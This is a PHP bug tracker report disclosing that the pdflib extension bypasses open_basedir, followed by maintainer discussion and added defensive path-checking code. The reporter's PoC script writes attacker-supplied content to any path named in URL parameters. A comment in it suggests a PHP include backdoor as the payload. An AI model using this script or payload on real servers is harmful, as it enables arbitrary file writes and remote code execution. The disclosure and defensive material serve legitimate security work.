Bug #58933 Pdflib open_basedir bypass
Submitted: 2009-11-03 16:16 UTC Modified: 2016-08-25 13:40 UTC
From: r3d dot w0rm at yahoo dot com Assigned:
Status: Wont fix Package: pdflib (PECL)
PHP Version: 5.3.0 OS: Linux,Windows
Private report: No CVE-ID: None

 [2009-11-03 16:16 UTC] r3d dot w0rm at yahoo dot com
Description:
------------
Via this bug, an attacker can save a file in a path that is not allowed by open_basedir.

Reproduce code:
---------------
<?php
// Author : Sina Yazdanmehr (R3d.W0rm) ; Our Site : http://IrCrash.com
if(!extension_loaded('pdf')){
   die('pdf extension required .');   
}else{
    $__PATH = $_GET['p']; /*The path that u want save file in .ex: /etc/file.php*/
    $__VALUE = $_GET['v']; /*The text that u want save in file .ex: <?php include $_GET[f];?>*/
    if(!isset($__PATH,$__VALUE)){
        die('/expl.php?p=[path_u_want_save_file]/[file_name]&v=[value_u_want_save_in_file]');
    }
    $__IRCRASH = pdf_new();
    pdf_open_file($__IRCRASH,$__PATH);
    pdf_begin_page($__IRCRASH,612,792);
    pdf_add_note($__IRCRASH,100,650,200,750,$__VALUE,'R3d.W0rm','note',0);
    pdf_end_page($__IRCRASH);
    pdf_close($__IRCRASH);
    pdf_delete($__IRCRASH);
    print('<p>IrCrash Security Team .</p>');
    print('<p>' . $__PATH . "\n"  . 'created .</p>');
}
?>

Expected result:
----------------
When an attacker runs this code, a file is created in the path that the attacker inputs in `p` in the URL, with the value that the attacker inputs in `v` in the URL.


 [2009-11-03 16:20 UTC] r3d dot w0rm at yahoo dot com
Sina Yazdanmehr (R3d.W0rm) From IrCrash security team
 [2016-08-04 14:41 UTC] cmb@php.net
-Status: Open +Status: Feedback -Assigned To: +Assigned To: cmb
 [2016-08-04 14:41 UTC] cmb@php.net
According to the changelog[1] this issue appears to have been
fixed as of pdflib 2.1.8:

- added php_check_open_basedir

Or can you still reproduce the bug?

[1] <http://pecl.php.net/package-changelog.php?package=pdflib&release=2.1.8>
 [2016-08-04 15:06 UTC] rjs@php.net
The fix of pdflib 2.1.8 is no longer activated.

The problem is that it is not sufficient to check the APIs that have a filename parameter. PDFlib has several APIs which allow passing filenames in "option lists". These cannot be checked by the wrapper code.

So the only solution would be to add a functionality similar to php_check_open_basedir() to the PDFlib library itself. This is not planned at the moment.
 [2016-08-04 15:37 UTC] cmb@php.net
-Status: Feedback +Status: Open -Assigned To: cmb +Assigned To:
 [2016-08-25 13:40 UTC] rjs@php.net
-Status: Open +Status: Wont fix
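
Because the extension does not enforce open_basedir itself, the check has to happen in application code. The following is an added example, not part of the original report or of pdflib: it validates an output path against the open_basedir entries before the path is handed to pdf_open_file(). The helper names `allowed_base_dirs` and `path_within_bases` and the sample paths are assumptions.

```php
<?php
// Added example, not pdflib code. Function names and sample paths are hypothetical.

// open_basedir entries as a list; an empty list means no restriction is configured.
function allowed_base_dirs(?string $setting = null): array
{
    $setting = $setting ?? (string) ini_get('open_basedir');
    return array_values(array_filter(explode(PATH_SEPARATOR, $setting), 'strlen'));
}

// True if $path would be written under one of $bases. Stricter than core
// open_basedir: every entry is treated as a directory, never as a bare prefix.
function path_within_bases(string $path, array $bases): bool
{
    if ($bases === []) {
        return true;                       // nothing configured, nothing to enforce
    }
    if (strpos($path, "\0") !== false) {
        return false;
    }
    // The file may not exist yet, so resolve its directory ("..", symlinks).
    $dir = realpath(dirname($path));
    if ($dir === false) {
        return false;                      // unresolvable: fail closed
    }
    $target = $dir . DIRECTORY_SEPARATOR . basename($path);
    if (is_link($target)) {
        return false;                      // existing symlink could redirect the write
    }
    foreach ($bases as $base) {
        $real = realpath($base);
        if ($real === false) {
            continue;
        }
        $prefix = rtrim($real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (strncmp($target, $prefix, strlen($prefix)) === 0) {
            return true;
        }
    }
    return false;
}

// Constructed demo: the system temp directory is the only allowed base.
$tmp   = sys_get_temp_dir();
$bases = allowed_base_dirs($tmp);
var_dump(path_within_bases($tmp . '/report.pdf', $bases)); // path under the base
var_dump(path_within_bases('/etc/file.php', $bases));      // path from the report's example
```

Call `path_within_bases($path, allowed_base_dirs())` immediately before pdf_open_file() and before placing any filename into a PDFlib option list, which the wrapper code cannot inspect. The check and the write are separate steps, so the output directory should not be writable by untrusted users.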
 